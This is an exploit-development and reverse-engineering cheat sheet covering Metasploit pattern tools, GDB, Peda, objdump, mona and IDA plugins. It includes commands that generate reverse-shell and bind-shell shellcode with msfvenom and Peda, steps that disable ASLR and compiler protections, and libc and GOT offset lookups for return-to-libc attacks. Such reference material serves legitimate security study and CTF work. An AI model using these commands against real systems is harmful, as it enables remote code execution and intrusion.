6.2 KiB
Exploiting Tools
Metasploit
pattern_create.rb -l 3000 #Length
pattern_offset.rb -l 3000 -q 5f97d534 #Search offset
nasm_shell.rb
nasm> jmp esp #Get opcodes
msfelfscan -j esi /opt/fusion/bin/level01
Shellcodes
msfvenom /p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> [EXITFUNC=thread] [-e x86/shikata_ga_nai] -b "\x00\x0a\x0d" -f c
GDB
Install:
apt-get install gdb
Parameters:
-q --> No muestra mierda inicial al ejecutar gdb
-x <file> --> le pasas un archivo con instrucciones de gdb que ejecutará al inicio
-p <pid> --> Attach to process
Instructions
> disassemble main --> Dissasemble the function
> disassemble 0x12345678
> set disassembly-flavor intel
> set follow-fork-mode child/parent --> Follow created process
> p system --> Find the address of the system function
> help
> quit
> br func --> Add breakpoint to function
> br *func+23
> br *0x12345678
> del NUM --> Delete that number of br
> watch EXPRESSION --> Break if the value changes
> run --> Execute
> start --> Start and break in main
> n/next --> Execute next instruction no inside
> s/step --> Execute next instruction
> c/continue --> Continue until next breakpoint
> set $eip = 0x12345678 --> Change value of $eip
> info functions --> Info abount functions
> info functions func --> Info of the funtion
> info registers --> Value of the registers
> bt --> Stack
> bt full --> Detailed stack
> print variable
> print 0x87654321 - 0x12345678 --> Caculate
> examine o/x/u/t/i/s dir_mem/reg/puntero --> Shows content in octal/hexa/10/bin/instruction/ascii
- x/o 0xDir_hex
- x/2x $eip --> 2Words from EIP
- x/2x $eip -4 --> $eip - 4
- x/8xb $eip --> 8 bytes
b-> byte, h-> 2bytes, w-> 4bytes, g-> 8bytes
- i r eip --> Value of $eip
- x/w pointer --> Value of the pointer
- x/s pointer --> String pointed by the pointer
- x/xw &pointer --> Address where the poiniter is located
- x/i $eip —> Instructions of the EIP
Peda
shellcode generate x86/linux bindport 5555 127.0.0.1
shellcode generate x86/linux connect 5555 127.0.0.1
checksec --> Check protections
searchmem /bin/sh --> Find that string /bin/sh
inside the memory
GDB server
gdbserver --multi 0.0.0.0:23947 in IDA you have to fill the absolute path of the executable in the Linux machine and in the Windows machine
GCC
gcc -fno-stack-protector -D_FORTIFY_SOURCE=0 -z norelro -z execstack 1.2.c -o 1.2 --> Compile without protections
-o --> Output
-g --> Save code GDB will be able to see it
echo 0 > /proc/sys/kernel/randomize_va_space --> To deactivate the ASLR in linux
To compile a shellcode:
nasm -f elf assembly.asm --> return a ".o"
ld assembly.o -o shellcodeout --> Executable
Objdump
-d --> Disassemble executable sections see opcodes of a compiled shellcode, find ROP Gadgets, find function address...
-Mintel --> Intel sintax
-t --> Symbols table grep varBSS to get the address
-D --> Disassemble all address of static variable
-s -j .dtors --> Contenido de dtors
-s -j .got --> Contenido de got
-TR --> Relocations
ojdump -t --dynamic-relo ./exec | grep puts --> Address of "puts" to modify in GOT
objdump -TR ./exec | grep exit(func lib) —> Get address of all the functions inside the GOT
Core dumps
- Run
ulimit -c unlimited
before starting my program - Run
sudo sysctl -w kernel.core_pattern=/tmp/core-%e.%p.%h.%t
- sudo gdb --core=<path/core> --quiet
More
ldd executable | grep libc.so.6 --> Address if ASLR, then this change every time
for i in `seq 0 20`; do ldd <Ejecutable> | grep libc; done --> Loop to see if the address changes a lot
readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system --> Offset of "system"
strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh --> Offset of "/bin/sh"
strace executable --> Functions called by the executable
rabin2 -i ejecutable --> Address of all the functions
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb --length 1000
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb --length 1000 --query 1Ad2
Inmunity debugger
!mona modules #Get protections, look for all false except last one (Dll of SO)
!mona find -s "\xff\xe4" -m name_unsecure.dll #Search for opcodes insie dll space (JMP ESP)
IDA
Debugging in remote linux
Inside the IDA folder you can find binaries that can be used to debug a binary inside a linux. To do so move the binary linux_server or linux_server64 inside the linux server and run it nside the folder that contains the binary:
./linux_server64 -Ppass
Then, configure the debugger: Debugger linux remote
--> Proccess options...:
Delphi binaries
I you have to reverse a Delphi binary I would suggest you tu use the IDA plugin https://github.com/Coldzer0/IDA-For-Delphi****
Just press ATL+f7 import python plugin in IDA
and select the python plugin.
This plugin will execute the binary and resolve functoin names dynamically att the start of the debugging. After starting the debugging press again the Start button the green one or f9
and a breakpoint will hit in the begining of the real code.
It is also very interesting because if you press a boton in the graphic application the debugger will stop in the function executed by that bottom.
Golang binaries
I you have to reverse a Golang binary I would suggest you tu use the IDA plugin https://github.com/sibears/IDAGolangHelper
Just press ATL+f7 import python plugin in IDA
and select the python plugin.
This will resolve the names of the functions.